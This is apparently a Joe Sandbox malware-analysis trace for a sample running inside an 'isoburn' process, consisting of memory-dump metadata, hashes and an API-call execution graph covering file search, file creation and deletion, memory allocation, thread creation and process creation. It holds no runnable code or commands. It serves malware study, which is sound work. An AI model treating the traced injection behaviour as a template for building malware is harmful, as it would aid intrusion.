                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                            • API String ID: 0-2877786613
                                                                                                                            • Opcode ID: de615dae7a0058292bd6d8e103770f6a6032175ab8570c2000e91845ced86895
                                                                                                                            • Instruction ID: 57258cd10a7b65106285654e1180825db2884d246662da8090f62aaedf61e1ad
                                                                                                                            • Opcode Fuzzy Hash: de615dae7a0058292bd6d8e103770f6a6032175ab8570c2000e91845ced86895
                                                                                                                            • Instruction Fuzzy Hash: E8318075961A297FEB01EB94CC02FFF773CAF55700F404049FA14AB281E7B46A418BA6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$h$o
                                                                                                                            • API String ID: 0-3662636641
                                                                                                                            • Opcode ID: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                                                                            • Instruction ID: e63b9cb7500170b52d0adf0a2702a59c364edfd714d142e8a4bdd9c3296faa74
                                                                                                                            • Opcode Fuzzy Hash: 1214df47e0ef03c80a2cea39ad4e4dfb3cfc067ccdb1f28c8b83395e691c4ee7
                                                                                                                            • Instruction Fuzzy Hash: D54165B5C153286BEB11EBA4CC45FEEB378BF48700F40969AA50DB6140EBB45BC48F95
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                                                                                            • Instruction ID: 8acb68d3b40d2f558dacc3464791d56212b3b0d6a6f6d475b920e074dd73ffe7
                                                                                                                            • Opcode Fuzzy Hash: d846e5e1f6de2c3ca1d7da4e9721de2f0c8fb86d22d2dfc56f871dd82193f03c
                                                                                                                            • Instruction Fuzzy Hash: F311EBB5910318ABDF14DF94DC84ADEBBB9FF45714F04824EE9195B101E3B1D544CBA0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_2f20000_QfgdvbjddZ.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $e$k$o
                                                                                                                            • API String ID: 0-3624523832
                                                                                                                            • Opcode ID: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                                                                                            • Instruction ID: 3d52c98d89c84d865cd0554e8630565d8a19d33457670a3d46f7693d4fcae780
                                                                                                                            • Opcode Fuzzy Hash: 92e3829bf4d7beda889854947f3e1fe7129153f5eed0d2d2d455c509ec4f0535
                                                                                                                            • Instruction Fuzzy Hash: F901C0B2900318ABDB14DF98D884ADEF7B9FF48714F048209E919AB201E771E944CBA0

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:4.4%
                                                                                                                            Signature Coverage:1.6%
                                                                                                                            Total number of Nodes:434
                                                                                                                            Total number of Limit Nodes:69
                                                                                                                            execution_graph 98698 2d23013 98703 2d27c60 98698->98703 98702 2d2303f 98704 2d23023 98703->98704 98705 2d27c7a 98703->98705 98704->98702 98709 2d393a0 98704->98709 98712 2d38aa0 98705->98712 98708 2d393a0 NtClose 98708->98704 98710 2d393ba 98709->98710 98711 2d393cb NtClose 98710->98711 98711->98702 98713 2d38abd 98712->98713 98716 50435c0 LdrInitializeThunk 98713->98716 98714 2d27d4a 98714->98708 98716->98714 98717 2d26c90 98718 2d26cba 98717->98718 98721 2d27e10 98718->98721 98720 2d26ce1 98722 2d27e2d 98721->98722 98728 2d38af0 98722->98728 98724 2d27e84 98724->98720 98725 2d27e7d 98725->98724 98733 2d38bd0 98725->98733 98727 2d27ead 98727->98720 98729 2d38b8b 98728->98729 98730 2d38b1b 98728->98730 98738 5042f30 LdrInitializeThunk 98729->98738 98730->98725 98731 2d38bc4 98731->98725 98734 2d38c84 98733->98734 98736 2d38c02 98733->98736 98739 5042d10 LdrInitializeThunk 98734->98739 98735 2d38cc9 98735->98727 98736->98727 98738->98731 98739->98735 98745 2d31690 98746 2d316ac 98745->98746 98747 2d316d4 98746->98747 98748 2d316e8 98746->98748 98749 2d393a0 NtClose 98747->98749 98750 2d393a0 NtClose 98748->98750 98751 2d316dd 98749->98751 98752 2d316f1 98750->98752 98755 2d3b5a0 RtlAllocateHeap 98752->98755 98754 2d316fc 98755->98754 98756 2d39210 98757 2d392b7 98756->98757 98759 2d3923b 98756->98759 98758 2d392cd NtReadFile 98757->98758 98760 2d22242 98761 2d22202 98760->98761 98763 2d2220b 98760->98763 98764 2d39440 98761->98764 98765 2d394cf 98764->98765 98767 2d3946b 98764->98767 98769 5042e80 LdrInitializeThunk 98765->98769 98766 2d39500 98766->98763 98767->98763 98769->98766 98770 2d1b400 98773 2d3b3f0 98770->98773 98772 2d1ca71 98776 2d39510 98773->98776 98775 2d3b421 98775->98772 98777 2d395a8 98776->98777 98779 2d3953e 98776->98779 98778 2d395be NtAllocateVirtualMemory 98777->98778 98778->98775 98779->98775 98780 2d2ac40 98785 2d2a950 98780->98785 98782 2d2ac4d 98799 2d2a5c0 98782->98799 98784 2d2ac69 98786 2d2a975 98785->98786 98810 2d28250 98786->98810 98789 2d2aac0 98789->98782 98791 2d2aad7 98791->98782 98792 2d2aace 98792->98791 98794 2d2abc5 98792->98794 98829 2d2a010 98792->98829 98796 2d2ac2a 98794->98796 98838 2d2a380 98794->98838 98842 2d3b480 98796->98842 98800 2d2a5d6 98799->98800 98807 2d2a5e1 98799->98807 98801 2d3b560 RtlAllocateHeap 98800->98801 98801->98807 98802 2d2a608 98802->98784 98803 2d28250 GetFileAttributesW 98803->98807 98804 2d2a922 98805 2d2a93b 98804->98805 98806 2d3b480 RtlFreeHeap 98804->98806 98805->98784 98806->98805 98807->98802 98807->98803 98807->98804 98808 2d2a010 RtlFreeHeap 98807->98808 98809 2d2a380 RtlFreeHeap 98807->98809 98808->98807 98809->98807 98811 2d28271 98810->98811 98812 2d28278 GetFileAttributesW 98811->98812 98813 2d28283 98811->98813 98812->98813 98813->98789 98814 2d33270 98813->98814 98815 2d3327e 98814->98815 98816 2d33285 98814->98816 98815->98792 98845 2d24460 98816->98845 98819 2d332c9 98825 2d33474 98819->98825 98849 2d3b560 98819->98849 98822 2d332e2 98823 2d3346a 98822->98823 98822->98825 98826 2d332fe 98822->98826 98824 2d3b480 RtlFreeHeap 98823->98824 98823->98825 98824->98825 98825->98792 98826->98825 98827 2d3b480 RtlFreeHeap 98826->98827 98828 2d3345e 98827->98828 98828->98792 98830 2d2a036 98829->98830 98856 2d2da50 98830->98856 98832 2d2a0a8 98834 2d2a230 98832->98834 98835 2d2a0c6 98832->98835 98833 2d2a215 98833->98792 98834->98833 98836 2d29ed0 RtlFreeHeap 98834->98836 98835->98833 98861 2d29ed0 98835->98861 98836->98834 98839 2d2a3a6 98838->98839 98840 2d2da50 RtlFreeHeap 98839->98840 98841 2d2a42d 98840->98841 98841->98794 98869 2d39720 98842->98869 98844 2d2ac31 98844->98782 98846 2d24484 98845->98846 98847 2d244c0 LdrLoadDll 98846->98847 98848 2d2448b 98846->98848 98847->98848 98848->98819 98852 2d32d30 LdrLoadDll 98848->98852 98853 2d396d0 98849->98853 98851 2d3b57b 98851->98822 98852->98819 98854 2d396ea 98853->98854 98855 2d396fb RtlAllocateHeap 98854->98855 98855->98851 98858 2d2da74 98856->98858 98857 2d2da81 98857->98832 98858->98857 98859 2d3b480 RtlFreeHeap 98858->98859 98860 2d2dac4 98859->98860 98860->98832 98862 2d29eed 98861->98862 98865 2d2dae0 98862->98865 98864 2d29ff3 98864->98835 98866 2d2db04 98865->98866 98867 2d2dbae 98866->98867 98868 2d3b480 RtlFreeHeap 98866->98868 98867->98864 98868->98867 98870 2d3973a 98869->98870 98871 2d3974b RtlFreeHeap 98870->98871 98871->98844 98872 2d221c0 98877 2d38a00 98872->98877 98875 2d39440 LdrInitializeThunk 98876 2d2220b 98875->98876 98878 2d38a1d 98877->98878 98881 5042c0a 98878->98881 98879 2d221f6 98879->98875 98882 5042c11 98881->98882 98883 5042c1f LdrInitializeThunk 98881->98883 98882->98879 98883->98879 98889 2d3c580 98890 2d3b480 RtlFreeHeap 98889->98890 98891 2d3c595 98890->98891 98892 2d39300 98893 2d39377 98892->98893 98895 2d3932b 98892->98895 98894 2d3938d NtDeleteFile 98893->98894 98896 5042ad0 LdrInitializeThunk 98897 2d28704 98899 2d28714 98897->98899 98898 2d286c1 98899->98898 98901 2d26fb0 98899->98901 98902 2d26fc6 98901->98902 98904 2d26fff 98901->98904 98902->98904 98905 2d26e20 LdrLoadDll 98902->98905 98904->98898 98905->98904 98906 2d22688 98907 2d2269f 98906->98907 98910 2d261c0 98907->98910 98909 2d226b3 98911 2d261f3 98910->98911 98912 2d26217 98911->98912 98917 2d38f00 98911->98917 98912->98909 98914 2d2623a 98914->98912 98915 2d393a0 NtClose 98914->98915 98916 2d262ba 98915->98916 98916->98909 98918 2d38f1d 98917->98918 98921 5042ca0 LdrInitializeThunk 98918->98921 98919 2d38f49 98919->98914 98921->98919 98922 2d27289 98923 2d2728e 98922->98923 98925 2d27232 98922->98925 98924 2d2727f 98925->98924 98927 2d2b170 98925->98927 98928 2d2b196 98927->98928 98933 2d2b3c6 98928->98933 98954 2d397b0 98928->98954 98930 2d2b20c 98930->98933 98957 2d3c650 98930->98957 98932 2d2b22b 98932->98933 98934 2d2b2ff 98932->98934 98935 2d38a00 LdrInitializeThunk 98932->98935 98933->98924 98937 2d25a30 LdrInitializeThunk 98934->98937 98938 2d2b31e 98934->98938 98936 2d2b28a 98935->98936 98936->98934 98940 2d2b293 98936->98940 98937->98938 98942 2d2b3ae 98938->98942 98970 2d38570 98938->98970 98939 2d2b2e7 98966 2d27fe0 98939->98966 98940->98933 98940->98939 98941 2d2b2c5 98940->98941 98963 2d25a30 98940->98963 98985 2d34690 LdrInitializeThunk 98941->98985 98948 2d27fe0 LdrInitializeThunk 98942->98948 98950 2d2b3bc 98948->98950 98949 2d2b385 98975 2d38620 98949->98975 98950->98924 98952 2d2b39f 98980 2d38780 98952->98980 98955 2d397cd 98954->98955 98956 2d397de CreateProcessInternalW 98955->98956 98956->98930 98958 2d3c5c0 98957->98958 98959 2d3c61d 98958->98959 98960 2d3b560 RtlAllocateHeap 98958->98960 98959->98932 98961 2d3c5fa 98960->98961 98962 2d3b480 RtlFreeHeap 98961->98962 98962->98959 98964 2d38bd0 LdrInitializeThunk 98963->98964 98965 2d25a6e 98964->98965 98965->98941 98967 2d27ff3 98966->98967 98986 2d38900 98967->98986 98969 2d2801e 98969->98924 98971 2d385f0 98970->98971 98972 2d3859e 98970->98972 98992 50439b0 LdrInitializeThunk 98971->98992 98972->98949 98973 2d38615 98973->98949 98976 2d3864e 98975->98976 98977 2d386a0 98975->98977 98976->98952 98993 5044340 LdrInitializeThunk 98977->98993 98978 2d386c5 98978->98952 98981 2d387fd 98980->98981 98983 2d387ab 98980->98983 98994 5042fb0 LdrInitializeThunk 98981->98994 98982 2d38822 98982->98942 98983->98942 98985->98939 98987 2d38981 98986->98987 98988 2d3892e 98986->98988 98991 5042dd0 LdrInitializeThunk 98987->98991 98988->98969 98989 2d389a6 98989->98969 98991->98989 98992->98973 98993->98978 98994->98982 98995 2d25ab0 98996 2d27fe0 LdrInitializeThunk 98995->98996 98997 2d25ae0 98996->98997 98999 2d25b0c 98997->98999 99000 2d27f60 98997->99000 99001 2d27fa4 99000->99001 99002 2d27fc5 99001->99002 99007 2d386d0 99001->99007 99002->98997 99004 2d27fb5 99005 2d27fd1 99004->99005 99006 2d393a0 NtClose 99004->99006 99005->98997 99006->99002 99008 2d38750 99007->99008 99009 2d386fe 99007->99009 99012 5044650 LdrInitializeThunk 99008->99012 99009->99004 99010 2d38775 99010->99004 99012->99010 99013 2d27030 99014 2d27049 99013->99014 99022 2d2709c 99013->99022 99016 2d393a0 NtClose 99014->99016 99014->99022 99015 2d271d4 99017 2d27064 99016->99017 99023 2d26450 NtClose LdrInitializeThunk LdrInitializeThunk 99017->99023 99019 2d271ae 99019->99015 99025 2d26620 NtClose LdrInitializeThunk LdrInitializeThunk 99019->99025 99022->99015 99024 2d26450 NtClose LdrInitializeThunk LdrInitializeThunk 99022->99024 99023->99022 99024->99019 99025->99015 99026 2d2f730 99027 2d2f794 99026->99027 99028 2d261c0 2 API calls 99027->99028 99030 2d2f8c7 99028->99030 99029 2d2f8ce 99030->99029 99055 2d262d0 99030->99055 99032 2d2fa73 99033 2d2f94a 99033->99032 99034 2d2fa82 99033->99034 99059 2d2f510 99033->99059 99035 2d393a0 NtClose 99034->99035 99037 2d2fa8c 99035->99037 99038 2d2f986 99038->99034 99039 2d2f991 99038->99039 99040 2d3b560 RtlAllocateHeap 99039->99040 99041 2d2f9ba 99040->99041 99042 2d2f9c3 99041->99042 99043 2d2f9d9 99041->99043 99044 2d393a0 NtClose 99042->99044 99068 2d2f400 99043->99068 99047 2d2f9cd 99044->99047 99046 2d2f9e7 99072 2d38e60 99046->99072 99049 2d2fa62 99050 2d393a0 NtClose 99049->99050 99051 2d2fa6c 99050->99051 99052 2d3b480 RtlFreeHeap 99051->99052 99052->99032 99053 2d2fa05 99053->99049 99054 2d38e60 LdrInitializeThunk 99053->99054 99054->99053 99056 2d262f5 99055->99056 99076 2d38d10 99056->99076 99060 2d2f52c 99059->99060 99061 2d24460 LdrLoadDll 99060->99061 99063 2d2f54a 99061->99063 99062 2d2f553 99062->99038 99063->99062 99064 2d24460 LdrLoadDll 99063->99064 99065 2d2f61e 99064->99065 99066 2d24460 LdrLoadDll 99065->99066 99067 2d2f678 99065->99067 99066->99067 99067->99038 99069 2d2f412 CoInitialize 99068->99069 99071 2d2f465 99069->99071 99070 2d2f4fb CoUninitialize 99070->99046 99071->99070 99073 2d38e7a 99072->99073 99081 5042ba0 LdrInitializeThunk 99073->99081 99074 2d38eaa 99074->99053 99077 2d38d2a 99076->99077 99080 5042c60 LdrInitializeThunk 99077->99080 99078 2d26369 99078->99033 99080->99078 99081->99074 99082 2d30030 99083 2d30053 99082->99083 99084 2d24460 LdrLoadDll 99083->99084 99085 2d30077 99084->99085 99086 2d38830 99087 2d388c2 99086->99087 99088 2d3885e 99086->99088 99091 5042ee0 LdrInitializeThunk 99087->99091 99089 2d388f3 99091->99089 99097 2d389b0 99098 2d389cd 99097->99098 99101 5042df0 LdrInitializeThunk 99098->99101 99099 2d389f5 99101->99099 99102 2d35f70 99103 2d35fca 99102->99103 99105 2d35fd7 99103->99105 99106 2d33980 99103->99106 99107 2d3b3f0 NtAllocateVirtualMemory 99106->99107 99109 2d339be 99107->99109 99108 2d33ace 99108->99105 99109->99108 99110 2d24460 LdrLoadDll 99109->99110 99112 2d33a04 99110->99112 99111 2d33a50 Sleep 99111->99112 99112->99108 99112->99111 99115 2d19e36 99116 2d19e0c 99115->99116 99119 2d19e39 99115->99119 99117 2d19e30 99116->99117 99118 2d19e1d CreateThread 99116->99118 99121 2d1a592 99119->99121 99122 2d3b0e0 99119->99122 99123 2d3b106 99122->99123 99128 2d14020 99123->99128 99125 2d3b112 99126 2d3b14b 99125->99126 99131 2d35500 99125->99131 99126->99121 99130 2d1402d 99128->99130 99135 2d23120 99128->99135 99130->99125 99132 2d35562 99131->99132 99133 2d3556f 99132->99133 99146 2d21910 99132->99146 99133->99126 99137 2d2313d 99135->99137 99136 2d23156 99136->99130 99137->99136 99139 2d39e10 99137->99139 99141 2d39e2a 99139->99141 99140 2d39e59 99140->99136 99141->99140 99142 2d38a00 LdrInitializeThunk 99141->99142 99143 2d39eb9 99142->99143 99144 2d3b480 RtlFreeHeap 99143->99144 99145 2d39ed2 99144->99145 99145->99136 99147 2d2194b 99146->99147 99162 2d27d70 99147->99162 99149 2d21953 99150 2d3b560 RtlAllocateHeap 99149->99150 99161 2d21c1d 99149->99161 99151 2d21969 99150->99151 99152 2d3b560 RtlAllocateHeap 99151->99152 99153 2d2197a 99152->99153 99154 2d3b560 RtlAllocateHeap 99153->99154 99155 2d21988 99154->99155 99156 2d21a1f 99155->99156 99177 2d26920 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99155->99177 99158 2d24460 LdrLoadDll 99156->99158 99159 2d21bd2 99158->99159 99173 2d37e40 99159->99173 99161->99133 99163 2d27d9c 99162->99163 99164 2d27c60 2 API calls 99163->99164 99165 2d27dbf 99164->99165 99166 2d27de1 99165->99166 99167 2d27dc9 99165->99167 99169 2d27dfd 99166->99169 99171 2d393a0 NtClose 99166->99171 99168 2d27dd4 99167->99168 99170 2d393a0 NtClose 99167->99170 99168->99149 99169->99149 99170->99168 99172 2d27df3 99171->99172 99172->99149 99174 2d37ea2 99173->99174 99176 2d37eaf 99174->99176 99178 2d21c30 99174->99178 99176->99161 99177->99156 99194 2d28040 99178->99194 99180 2d221a6 99180->99176 99181 2d21c50 99181->99180 99198 2d31060 99181->99198 99184 2d21e64 99186 2d3c650 2 API calls 99184->99186 99185 2d21cae 99185->99180 99201 2d3c520 99185->99201 99188 2d21e79 99186->99188 99187 2d27fe0 LdrInitializeThunk 99190 2d21ec9 99187->99190 99188->99190 99206 2d20760 99188->99206 99190->99180 99190->99187 99192 2d20760 LdrInitializeThunk 99190->99192 99191 2d27fe0 LdrInitializeThunk 99193 2d22023 99191->99193 99192->99190 99193->99190 99193->99191 99195 2d2804d 99194->99195 99196 2d28075 99195->99196 99197 2d2806e SetErrorMode 99195->99197 99196->99181 99197->99196 99199 2d3b3f0 NtAllocateVirtualMemory 99198->99199 99200 2d31081 99199->99200 99200->99185 99202 2d3c530 99201->99202 99203 2d3c536 99201->99203 99202->99184 99204 2d3b560 RtlAllocateHeap 99203->99204 99205 2d3c55c 99204->99205 99205->99184 99207 2d2077c 99206->99207 99210 2d39640 99207->99210 99211 2d3965a 99210->99211 99214 5042c70 LdrInitializeThunk 99211->99214 99212 2d20782 99212->99193 99214->99212 99215 2d20d3b PostThreadMessageW 99216 2d20d4d 99215->99216 99217 2d29aff 99219 2d29b0f 99217->99219 99218 2d29b16 99219->99218 99220 2d3b480 RtlFreeHeap 99219->99220 99220->99218 99221 2d2c4e0 99223 2d2c509 99221->99223 99222 2d2c60d 99223->99222 99224 2d2c5b3 FindFirstFileW 99223->99224 99224->99222 99226 2d2c5ce 99224->99226 99225 2d2c5f4 FindNextFileW 99225->99226 99227 2d2c606 FindClose 99225->99227 99226->99225 99227->99222 99228 2d390a0 99229 2d3915a 99228->99229 99231 2d390d2 99228->99231 99230 2d39170 NtCreateFile 99229->99230 99232 2d31a20 99237 2d31a39 99232->99237 99233 2d31ac9 99234 2d31a84 99235 2d3b480 RtlFreeHeap 99234->99235 99236 2d31a94 99235->99236 99237->99233 99237->99234 99238 2d31ac4 99237->99238 99239 2d3b480 RtlFreeHeap 99238->99239 99239->99233
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D2C5C4
                                                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02D2C5FF
                                                                                                                            • FindClose.KERNELBASE(?), ref: 02D2C60A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                                                            • Instruction ID: c9aeaa8f4e9289fff01d012c566a7058258f4997ae1630098b055ac42a5625a3
                                                                                                                            • Opcode Fuzzy Hash: e0e4ab5681de5c45ff79cebf018db38bbb7cf9476f463ec314f46df59579a4f1
                                                                                                                            • Instruction Fuzzy Hash: E731B071900258BBDB20DB60CC85FEF737DEB55749F104549F908A6290EB70AE84CBA0
                                                                                                                            APIs
                                                                                                                            • NtCreateFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?,?,?), ref: 02D391A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                                                            • Instruction ID: bacf252883f7ffb5e92952bf400ee63a9c6364d5efdde7fd80a54d142fd60181
                                                                                                                            • Opcode Fuzzy Hash: 308ac50792df477026cb561dcc4cf68acc9d51b989d0347635f238ba06fcb5ac
                                                                                                                            • Instruction Fuzzy Hash: 3731C1B5A01648ABDB54DF98D880EEEB7F9EF88710F108619F919A7340D770A941CFA4
                                                                                                                            APIs
                                                                                                                            • NtReadFile.NTDLL(?,9ACB2CF8,?,?,?,?,?,?,?), ref: 02D392F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                                                            • Instruction ID: 04fbfb09541542e4d3c754d3a18b17149e0da722f42aceb01bb660a76e382539
                                                                                                                            • Opcode Fuzzy Hash: 2c58a360c0de9dc7a373e0bee972b50334e38d5de29b3ef381eda4472260049a
                                                                                                                            • Instruction Fuzzy Hash: EB31D0B5A00608ABDB14DF98D881EEFB7F9EB88714F108219F918A7341D770A911CFA4
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(02D21CAE,9ACB2CF8,02D37EAF,00000000,00000004,00003000,?,?,?,?,?,02D37EAF,02D21CAE), ref: 02D395DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2167126740-0
                                                                                                                            • Opcode ID: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                                                            • Instruction ID: 624006ea6597bb82759065c9fe54e8e5a3f908b7ac2d5fa946a4055ecc863ff0
                                                                                                                            • Opcode Fuzzy Hash: 876b2ff75e95e980c74c6c40eec0a89dc8aede90924d9f7bf2a4acee420dec04
                                                                                                                            • Instruction Fuzzy Hash: B12126B5A00609ABDB10DF98D841FEFB7B9EF89700F104619F918A7341DB70A911CBA4
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4033686569-0
                                                                                                                            • Opcode ID: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                                                            • Instruction ID: 861977693db6fe156f7b02e9726e36f45866ecdfddc273868accf77c282f19fd
                                                                                                                            • Opcode Fuzzy Hash: aedce5cd128354d543e9150db18d04ab6f90d43c814e97b7e7b4cc93d36a544a
                                                                                                                            • Instruction Fuzzy Hash: 8B119E71601A047AE720EB68DC01FEFB3ACEF86714F104619FA18A7281DB75B9058BB5
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D393D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_2d10000_isoburn.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction ID: f899513e8f3b91019cf67fcf8c7ab1d843efcdb44c6a421e124683e1902aad69
                                                                                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                                                                                            • Instruction Fuzzy Hash: 74E046362006547BE220EB69EC41FDB77ADDBC6710F004119FA0CA7242C671BA108BB0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 66088723605e128678cbbfe8a66aa738e505e423c3a47575447f99a5997b1f4e
                                                                                                                            • Instruction ID: 5948edde21370538d705b196c488a98b9b722e7e96549b16224a074cd1111c90
                                                                                                                            • Opcode Fuzzy Hash: 66088723605e128678cbbfe8a66aa738e505e423c3a47575447f99a5997b1f4e
                                                                                                                            • Instruction Fuzzy Hash: 3F9002626015004251407158984440B60159BE13113E5C115B8554560C86188D559669
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8778f544439ba0e950798f296c0eaea612527143d14142160d29ca36959d5857
                                                                                                                            • Instruction ID: cb078fc5adc8a3aa38519acdb7886d7c0a459edb7e43c42d4b9d56b8fe91b1d7
                                                                                                                            • Opcode Fuzzy Hash: 8778f544439ba0e950798f296c0eaea612527143d14142160d29ca36959d5857
                                                                                                                            • Instruction Fuzzy Hash: 3290023260580012A140715898C454B40159BE0311BA5C011F8424554C8A148E565761
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
